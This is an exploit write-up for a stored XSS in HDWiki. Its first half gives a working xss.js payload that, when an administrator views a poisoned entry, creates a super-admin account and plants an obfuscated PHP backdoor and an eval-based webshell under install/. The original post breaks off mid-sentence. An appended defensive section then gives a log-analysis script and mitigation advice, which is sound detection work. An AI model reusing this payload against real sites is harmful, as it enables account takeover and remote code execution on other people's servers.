An HDWiki stored XSS

Stored XSS when creating or editing an entry. Capture the request with Burp and modify it, inserting the payload at the following position in the multipart body (the `content` form field):

[php]
Content-Disposition: form-data; name="content"

------WebKitFormBoundaryWQNSVRn07IYXGeMN
[/php]

Then submit.

The HDWiki admin cookie alone cannot be used to enter the backend or perform other backend operations: the backend is only reachable when `islogin = 2` in the session table. So only when the administrator has entered the backend and the payload fires is there a chance of adding a super administrator and getting a shell.

xss.js:

[php]
document.writeln("");

// Build an XMLHttpRequest object, falling back to the legacy ActiveX ProgIDs for old IE.
function ajax(){
    var request = false;
    if(window.XMLHttpRequest) {
        request = new XMLHttpRequest();
    } else if(window.ActiveXObject) {
        var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
                        'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
                        'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
        for(var i=0; i<versions.length; i++) {
            try {
                request = new ActiveXObject(versions[i]);
            } catch(e) {}
        }
    }
    return request;
}

var _x = ajax();
add();
shell();

function add() {
    src="index.php?admin_user-add";
    data="id=&username=admin_&password=admin_&email=admin_%40qq.com&groupid=4&submit=%C8%B7%B6%A8"; //add user=admin_ password=admin_
    xhr_act("POST",src,data);
}

function shell() {
    src="index.php?admin_filemanager-edit";
    data="fname=D%3A%2Fwamp%2Fwww%2Fhdwiki%2Finstall%2Findex.php&dir=.%2Finstall%2F&content=%3C%3Fphp%0D%0Aarray_map%28%22ass%5Cx65rt%22%2C%28array%29%24_REQUEST%5B%27test%27%5D%29%3B%0D%0A%40fputs%28%40fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29%3B%0D%0Aheader%28%27location%3Ainstall.php%27%29%3B%0D%0A%09%0D%0A%3F%3E&dosubmit=+%C8%B7%C8%CF%D0%DE%B8%C4+";
    //install/index.php test
    //fopen c.php 1
    xhr_act("POST",src,data);
}

// Synchronous request helper shared by add() and shell().
function xhr_act(_m,_s,_a){
    _x.open(_m,_s,false);
    if(_m=="POST")_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    _x.send(_a);
    return _x.responseText;
}
[/php]

Log in to the backend again and check, and you will find
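From the defender's side, the notable trait of this chain is that the privileged requests (`index.php?admin_user-add`, `index.php?admin_filemanager-edit`) are issued by the administrator's own browser while it is rendering an ordinary wiki page, so in the access log they carry the session of a legitimate admin but a Referer pointing at a content page rather than the admin panel, and the dropped shell lives under `install/`, which should not be reachable after installation. The script below is an added example, not code from the original post or from HDWiki: it parses constructed log lines in the Apache/nginx "combined" format (an assumption; adjust the regex to the real `LogFormat`) and flags both signals. The `doc-view-12` referer, the hostnames and the IPs are made up for the sample.

```python
"""Flag HDWiki admin actions that were issued from a non-admin page, and any
access to the install/ directory.  Example code, not part of HDWiki or of the
original write-up; the log format and the sample lines below are constructed."""
import re
from urllib.parse import urlparse
from typing import Dict, List, Optional

# Combined log format (assumed): ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: an admin views a poisoned entry (line 1), the injected
# script posts two admin actions from that page (lines 2-3), a genuine admin
# action from inside the admin panel (line 4), and a hit on install/ (line 5).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2013:10:01:02 +0800] "GET /hdwiki/index.php?doc-view-12 HTTP/1.1" 200 5120 "http://wiki.example.test/hdwiki/index.php" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2013:10:01:03 +0800] "POST /hdwiki/index.php?admin_user-add HTTP/1.1" 200 312 "http://wiki.example.test/hdwiki/index.php?doc-view-12" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2013:10:01:03 +0800] "POST /hdwiki/index.php?admin_filemanager-edit HTTP/1.1" 200 290 "http://wiki.example.test/hdwiki/index.php?doc-view-12" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2013:11:15:40 +0800] "POST /hdwiki/index.php?admin_user-add HTTP/1.1" 200 312 "http://wiki.example.test/hdwiki/index.php?admin_user-add" "Mozilla/5.0"
10.0.0.7 - - [12/Mar/2013:12:00:00 +0800] "GET /hdwiki/install/index.php?test=1 HTTP/1.1" 200 40 "-" "curl/7.29"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Return a finding label for a parsed entry, or None if it looks benign."""
    path = entry["path"]
    # The post describes the shell being written under install/; that directory
    # should not be served at all once installation is finished.
    if "/install/" in path:
        return "install_dir_access"
    # HDWiki routes admin actions as index.php?admin_<module>-<action>.  A POST to
    # one of them whose Referer is a content page (or absent) did not come from
    # the admin UI, which is exactly what script injected into an entry produces.
    if entry["method"] == "POST" and "index.php?admin_" in path:
        ref = entry["referer"]
        if ref in ("", "-"):
            return "admin_action_without_referer"
        if not urlparse(ref).query.startswith("admin_"):
            return "admin_action_from_content_page"
    return None


def analyse(log_text: str) -> List[Dict[str, str]]:
    """Run classify() over every line and collect the findings in log order."""
    findings = []
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry is None:
            continue
        reason = classify(entry)
        if reason:
            findings.append({
                "ts": entry["ts"], "ip": entry["ip"], "path": entry["path"],
                "referer": entry["referer"], "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['reason']:32} {f['path']} (referer: {f['referer']})")
```

The Referer check is a heuristic: browsers may strip the header under a referrer policy, and a client under the attacker's direct control can set anything, so treat a hit as a lead to correlate with the `admin_user-add` and file-manager audit trail rather than as proof. The durable fix is on the application side: encode the `content` field on output so markup in an entry never executes in an administrator's browser, and keep `install/` removed or blocked once the site is set up.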
